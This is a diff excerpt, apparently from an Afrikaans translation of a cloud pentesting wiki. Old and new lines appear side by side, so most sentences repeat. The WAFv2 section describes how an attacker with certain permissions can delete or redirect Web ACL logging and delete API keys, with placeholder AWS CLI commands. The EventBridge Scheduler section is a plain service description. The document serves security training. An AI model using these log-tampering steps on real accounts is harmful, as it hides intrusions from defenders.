'n Aanvaller met die **`wafv2:DeleteLoggingConfiguration`** sou in staat wees om die logging-konfigurasie van die gespesifiseerde Web ACL te verwyder. Vervolgens, met die **`wavf2:PutLoggingConfiguration`** en **`iam:CreateServiceLinkedRole`** toestemmings, kon 'n aanvaller logging-konfigurasies skep of vervang (nadat dit verwyder is) om of logging heeltemal te voorkom of logs na nie-gesaghebbende bestemmings te herlei, soos Amazon S3-buckets, Amazon CloudWatch Logs loggroep of 'n Amazon Kinesis Data Firehose onder beheer.
'n Aanvaller met die **`wafv2:DeleteLoggingConfiguration`** sou in staat wees om die logging-konfigurasie van die gespesifiseerde Web ACL te verwyder. Vervolgens, met die **`wavf2:PutLoggingConfiguration`** en **`iam:CreateServiceLinkedRole`** toestemmings, kan 'n aanvaller logging-konfigurasies skep of vervang (nadat dit verwyder is) om of logging heeltemal te voorkom of logs na ongemagtigde bestemmings te herlei, soos Amazon S3-buckets, Amazon CloudWatch Logs loggroep of 'n Amazon Kinesis Data Firehose onder beheer.
Tydens die skepproses stel die diens outomaties die nodige toestemmings op om te verseker dat logs na die gespesifiseerde logging-bestemming geskryf kan word:
- **Amazon CloudWatch Logs:** AWS WAF skep 'n hulpbronbeleid op die aangewese CloudWatch Logs loggroep. Hierdie beleid verseker dat AWS WAF die toestemmings het wat nodig is om logs na die loggroep te skryf.
- **Amazon S3 Bucket:** AWS WAF skep 'n emmerbeleid op die aangewese S3-emmer. Hierdie beleid verleen AWS WAF die nodige toestemmings om logs na die gespesifiseerde emmer op te laai.
- **Amazon S3 Bucket:** AWS WAF skep 'n emmerbeleid op die aangewese S3-bucket. Hierdie beleid verleen AWS WAF die nodige toestemmings om logs na die gespesifiseerde emmer op te laai.
- **Amazon Kinesis Data Firehose:** AWS WAF skep 'n diens-gekoppelde rol spesifiek vir interaksie met Kinesis Data Firehose. Hierdie rol laat AWS WAF toe om logs na die geconfigureerde Firehose-stroom te lewer.
> [!NOTE]
@@ -411,7 +409,7 @@ aws wafv2 put-logging-configuration --logging-configuration <value>
# Delete logging configuration
aws wafv2 delete-logging-configuration --resource-arn <value> [--log-scope <CUSTOMER | SECURITY_LAKE>] [--log-type <value>]
```
**Potensiële Impak:** Obskureer sigbaarheid in sekuriteit gebeurtenisse, moeilikheid in die insidentresponsproses, en fasiliteer oorgenoemde kwaadwillige aktiwiteite binne AWS WAF-beskermde omgewings.
**Potensiële Impak:** Obskure sigbaarheid in sekuriteitsevents, moeilikheid in die insidentresponsproses, en fasiliteer oorgenoeg kwaadwillige aktiwiteite binne AWS WAF-beskermde omgewings.
#### **`wafv2:DeleteAPIKey`**
@@ -424,7 +422,7 @@ aws wafv2 delete-api-key --api-key <value> --scope <REGIONAL --region=<value> |
#### **`wafv2:TagResource`, `wafv2:UntagResource`**
'n Aanvaller sal in staat wees om etikette by te voeg, te wysig of te verwyder van AWS WAFv2 hulpbronne, soos Web ACLs, reëlgroepe, IP stelle, regex patroon stelle, en logging konfigurasies.
'n Aanvaller sal in staat wees om etikette by te voeg, te wysig of te verwyder van AWS WAFv2 hulpbronne, soos Web ACLs, reëlgroepe, IP stelle, regex patroon stelle, en log konfigurasies.
```bash
# Tag
aws wafv2 tag-resource --resource-arn <value> --tags <value>

24
src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
View File

@@ -1,33 +1,31 @@
# AWS - EventBridge Scheduler Enum
## EventBridge Scheduler
{{#include ../../../banners/hacktricks-training.md}}
## EventBridge Scheduler
**Amazon EventBridge Scheduler** is 'n volledig bestuurde, **serverless scheduler wat ontwerp is om take te skep, te loop en te bestuur** op skaal. Dit stel jou in staat om miljoene take oor meer as 270 AWS-dienste en 6,000+ API-operasies te skeduleer, alles vanuit 'n sentrale diens. Met ingeboude betroubaarheid en geen infrastruktuur om te bestuur nie, vereenvoudig EventBridge Scheduler skedulering, verminder onderhoudskoste, en skaal outomaties om aan vraag te voldoen. Jy kan cron of tariefuitdrukkings konfigureer vir herhalende skedules, eenmalige aanroepings instel, en buigsame afleweringsvensters met herhalingsopsies definieer, wat verseker dat take betroubaar afgelewer word gebaseer op die beskikbaarheid van downstream-teikens.
**Amazon EventBridge Scheduler** is 'n volledig bestuurde, **serverless skeduleerder wat ontwerp is om take te skep, te loop en te bestuur** op skaal. Dit stel jou in staat om miljoene take oor meer as 270 AWS-dienste en 6,000+ API-operasies te skeduleer, alles vanuit 'n sentrale diens. Met ingeboude betroubaarheid en geen infrastruktuur om te bestuur nie, vereenvoudig EventBridge Scheduler skedulering, verminder onderhoudskoste, en skaal outomaties om aan die vraag te voldoen. Jy kan cron of tariefuitdrukkings konfigureer vir herhalende skedules, eenmalige aanroepings instel, en buigsame afleweringsvensters met herhalingsopsies definieer, wat verseker dat take betroubaar afgelewer word gebaseer op die beskikbaarheid van afwaartse teikens.
Daar is 'n aanvanklike limiet van 1,000,000 skedules per streek per rekening. Selfs die amptelike kwotas bladsy stel voor, "Dit word aanbeveel om eenmalige skedules te verwyder sodra hulle voltooi is."&#x20;
Daar is 'n aanvanklike limiet van 1,000,000 skedules per streek per rekening. Selfs die amptelike kwotas bladsy stel voor, "Dit word aanbeveel om eenmalige skedules te verwyder sodra hulle voltooi is."
### Types of Schedules
### Tipes Skedules
Tipes van Skedules in EventBridge Scheduler:
Tipes Skedules in EventBridge Scheduler:
1. **Eenmalige skedules** Voer 'n taak uit op 'n spesifieke tyd, bv. 21 Desember om 7 AM UTC.
1. **Eenmalige skedules** Voer 'n taak uit op 'n spesifieke tyd, bv. 21 Desember om 7 VM UTC.
2. **Tariefgebaseerde skedules** Stel herhalende take in op grond van 'n frekwensie, bv. elke 2 uur.
3. **Cron-gebaseerde skedules** Stel herhalende take in met 'n cron-uitdrukking, bv. elke Vrydag om 4 PM.
3. **Cron-gebaseerde skedules** Stel herhalende take in met 'n cron-uitdrukking, bv. elke Vrydag om 4 NM.
Twee Meganismes vir die Hantering van Mislukte Gebeure:
1. **Herhalingsbeleid** Definieer die aantal herhalingspogings vir 'n mislukte gebeurtenis en hoe lank om dit onverwerk te hou voordat dit as 'n mislukking beskou word.
2. **Doodbriefmandjie (DLQ)** 'n Standaard Amazon SQS-mandjie waar mislukte gebeurtenisse afgelewer word nadat herhalings uitgeput is. DLQ's help om probleme met jou skedule of sy downstream-teiken op te los.
1. **Herhalingsbeleid** Definieer die aantal herhalingspogings vir 'n mislukte gebeurtenis en hoe lank om dit onverwerkt te hou voordat dit as 'n mislukking beskou word.
2. **Doodbriefmandjie (DLQ)** 'n Standaard Amazon SQS-mandjie waar mislukte gebeurtenisse afgelewer word nadat herhalings uitgeput is. DLQ's help om probleme met jou skedule of sy afwaartse teiken op te los.
### Targets
### Teikens
Daar is 2 tipes teikens vir 'n scheduler [**templatet (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), wat algemeen gebruik word en AWS het dit makliker gemaak om te konfigureer, en [**universel (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), wat gebruik kan word om enige AWS API aan te roep.
Daar is 2 tipes teikens vir 'n skeduleerder [**templatet (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), wat algemeen gebruik word en AWS het dit makliker gemaak om te konfigureer, en [**universel (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), wat gebruik kan word om enige AWS API aan te roep.
**Templated targets** ondersteun die volgende dienste:
**Templated teikens** ondersteun die volgende dienste:
- CodeBuild StartBuild
- CodePipeline StartPipelineExecution